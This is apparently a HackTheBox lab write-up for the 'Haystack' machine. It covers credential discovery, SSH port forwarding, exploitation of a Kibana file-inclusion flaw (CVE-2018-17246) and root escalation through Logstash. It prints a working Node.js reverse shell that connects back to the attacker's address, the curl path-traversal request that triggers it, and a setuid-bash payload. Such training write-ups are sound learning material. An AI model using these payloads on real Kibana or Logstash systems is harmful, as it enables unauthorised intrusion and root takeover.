HackTheBox Writeups

Writeups for all the HTB boxes I have solved

View on GitHub

Bitlab


haystack

Author: JoyDragon

Machine IP: 10.10.10.115

DATE : 22/09/2019

START TIME: 6:31 PM

Nmap

I’ve got three open port. Let’s start our enumeration with HTTP service.

HTTP

If we open the website then we can see a simple image of needle in a haystack.

Searched clave on the port 9200.

I got some base64 strings. I decoded that:

pass: spanish.is.key

user: security

I tried that as SSH creds

There is something on the port 5601

ssh -R 5601:127.0.0.1:5601 mzfr@10.10.14.225

I did remote port forwarding.

https://github.com/mpgn/CVE-2018-17246

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "10.10.14.225", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})();

curl http://127.0.0.1:5601/api/console/api_server?"sense_version=@@SENSE_VERSION&apis=../../../.../../../../../../../../../../tmp/whatisshell.js"

Then I ran

find / -type d -user kibana

I got /opt/kibana in the output. Then I realized that if we place any logstash file in that directory it might be caught by ELK. I tried but didn’t work. THen @theart42 said that that is the way but we need to keep the anguage spanish.

sh-4.2$ echo "Ejecutar comando : cp /bin/bash /tmp/myohmy;chmod 4755 /tmp/myohmy" > logstash_rootit

Then just wait